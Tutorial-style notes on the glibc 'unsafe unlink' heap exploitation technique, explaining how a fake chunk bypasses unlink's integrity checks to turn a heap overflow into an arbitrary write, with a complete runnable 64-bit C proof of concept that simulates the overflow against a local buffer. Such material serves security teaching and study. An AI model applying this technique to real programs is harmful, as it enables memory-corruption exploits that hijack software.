For this method (the classic "unsafe unlink" attack on glibc malloc's unlink() macro / unlink_chunk()) to work you need:
- A global pointer (at a known address, e.g. in .bss) that points to the user data of a heap chunk, call it chunk_0
- A heap overflow from chunk_0 into the chunk that directly follows it (chunk_1), long enough to reach chunk_1's prev_size and size fields
-
Create a fake chunk P inside chunk_0, starting exactly at the address stored in the global pointer (chunk_0's user data), with prev_size, size, fd and bk fields.
-
Choose fd and bk of the fake chunk so that they point a few bytes before the global pointer itself:
- On 32-bit, fd sits at offset 8 and bk at offset 12 of a chunk, so set fd = &global_ptr - 12 and bk = &global_ptr - 8; then *(fd+12) == *(bk+8) == global_ptr == chunk_0 == P
- On 64-bit the offsets double: fd = &global_ptr - 0x18, bk = &global_ptr - 0x10
- With this we bypass both halves of the check P->fd->bk != P || P->bk->fd != P ("corrupted double-linked list")
- Set the size of the fake chunk:
  - P->size = the value we will write into chunk_1->prev_size, i.e. the distance from P to chunk_1's header (the old notes' "chunk_0->size = prev_size")
  - this bypasses the check made by libc, chunksize(P) != prev_size(next_chunk(P)) ("corrupted size vs. prev_size"), because next_chunk(P) = P + P->size lands exactly on chunk_1's header
  - if that size is in the large-bin range (>= 0x400 on 64-bit), the two words after bk (fd_nextsize, bk_nextsize) must be NULL, otherwise unlink also validates those pointers
-
Using the overflow, set chunk_1->prev_size = size_requested (the distance from P to chunk_1's header; for an aligned request this is exactly the size passed to malloc)
- such that chunk_1 - prev_size points at the start of the fake chunk
- from the allocator's point of view this shrinks chunk_0: the "previous chunk" of chunk_1 is now our fake chunk, which lies inside chunk_0
- clear the PREV_INUSE bit (bit 0) of chunk_1->size, so free() believes the previous chunk is free and will consolidate backward into it
-
Now free(chunk_1)
- free() sees PREV_INUSE clear, computes P = chunk_1 - prev_size (our fake chunk) and calls unlink(P)
- unlink performs FD->bk = BK and then BK->fd = FD; both stores land on the global pointer, which ends up equal to FD (&global_ptr - 0x18 on 64-bit, &global_ptr - 12 on 32-bit)
-
Our fake chunk gets unlinked and the global pointer is overwritten: it now points a few words before itself, so a write through the global pointer at the right offset overwrites the pointer with any address we choose, and the next write through it goes to that address.
-
We now have an arbitrary write.
- Caveat: chunk_1 must not be cached by tcache or a fastbin, otherwise free(chunk_1) never reaches the consolidation path. On glibc >= 2.26 use request sizes above the tcache limit (0x408 on 64-bit) and the fastbin limit (0x80), or fill the corresponding tcache bin first.
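The whole procedure above as one runnable program, added here as an example; it is not part of the original notes, although it follows the same layout as the well-known how2heap unsafe_unlink demo. It assumes 64-bit glibc (chunk header words are 8 bytes, tcache present, hence the 0x420 request size). The global pointer `chunk0_ptr`, the target buffer `victim` and `REQ_SIZE` are constructed for the demo, and the heap overflow is simulated by writing chunk_1's header directly from the same program.

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

_Static_assert(sizeof(void *) == 8, "this demo assumes 64-bit glibc chunk layout");

/* The "global pointer" the technique needs (hypothetical target program).
 * volatile: free() rewrites it behind the compiler's back, so force reloads. */
uint64_t *volatile chunk0_ptr;

/* Data we have no legitimate way to write; the final step overwrites it. */
char victim[32] = "untouched";

/* Above the tcache (0x408) and fastbin (0x80) limits, so free(chunk_1)
 * takes the consolidation path.  Constructed value for the demo. */
#define REQ_SIZE 0x420

/* Runs the attack; returns 1 if the global pointer was redirected and
 * victim was overwritten through it, 0 otherwise. */
int unsafe_unlink_demo(void) {
    chunk0_ptr = malloc(REQ_SIZE);              /* chunk_0, pointed to by the global */
    uint64_t *chunk1_ptr = malloc(REQ_SIZE);    /* chunk_1, directly after chunk_0 */
    if (!chunk0_ptr || !chunk1_ptr) return 0;

    /* Step 1: fake chunk P at chunk0_ptr.  Word layout: [0] prev_size, [1] size,
     * [2] fd, [3] bk, [4] fd_nextsize, [5] bk_nextsize. */
    uint64_t *P = chunk0_ptr;
    /* P->fd->bk must be P: bk is at offset 0x18, so fd = &chunk0_ptr - 0x18. */
    P[2] = (uint64_t)&chunk0_ptr - 3 * sizeof(uint64_t);
    /* P->bk->fd must be P: fd is at offset 0x10, so bk = &chunk0_ptr - 0x10. */
    P[3] = (uint64_t)&chunk0_ptr - 2 * sizeof(uint64_t);
    /* Fake size = distance from P to chunk_1's header, so that
     * chunksize(P) == prev_size(next_chunk(P)) and next_chunk(P) == chunk_1. */
    P[1] = REQ_SIZE;
    /* 0x420 is large-bin range: unlink_chunk() also checks fd_nextsize when
     * it is non-NULL, so keep both nextsize pointers NULL. */
    P[4] = 0;
    P[5] = 0;

    /* Step 2: the "heap overflow" into chunk_1's header, written directly here. */
    uint64_t *chunk1_hdr = chunk1_ptr - 2;      /* [0] prev_size, [1] size */
    chunk1_hdr[0] = REQ_SIZE;                   /* chunk_1 - prev_size == P */
    chunk1_hdr[1] &= ~(uint64_t)1;              /* clear PREV_INUSE */

    /* Step 3: free(chunk_1) consolidates backward and calls unlink(P):
     *   FD->bk = BK   stores chunk0_ptr = &chunk0_ptr - 0x10
     *   BK->fd = FD   stores chunk0_ptr = &chunk0_ptr - 0x18  (final value) */
    free(chunk1_ptr);
    if (chunk0_ptr != (uint64_t *)&chunk0_ptr - 3)
        return 0;                               /* unlink did not hit the global */

    /* Step 4: arbitrary write.  chunk0_ptr + 3 is &chunk0_ptr itself, so one
     * write through the global re-points it anywhere (memcpy: no aliasing games). */
    uint64_t target = (uint64_t)victim;
    memcpy(chunk0_ptr + 3, &target, sizeof target);
    /* ...and the next write through the global lands on the target. */
    strcpy((char *)chunk0_ptr, "pwned");

    return strcmp(victim, "pwned") == 0;
}

int main(void) {
    int ok = unsafe_unlink_demo();
    /* stderr is unbuffered: printing here allocates nothing on the corrupted heap. */
    fprintf(stderr, "pointer redirected and victim overwritten: %s (victim = \"%s\")\n",
            ok ? "yes" : "no", victim);
    return ok ? 0 : 1;
}
```

If the program aborts with "corrupted double-linked list" or "corrupted size vs. prev_size", one of the two unlink checks described above failed; the usual causes are a wrong fd/bk offset (32-bit versus 64-bit) or a fake size that does not match chunk_1->prev_size.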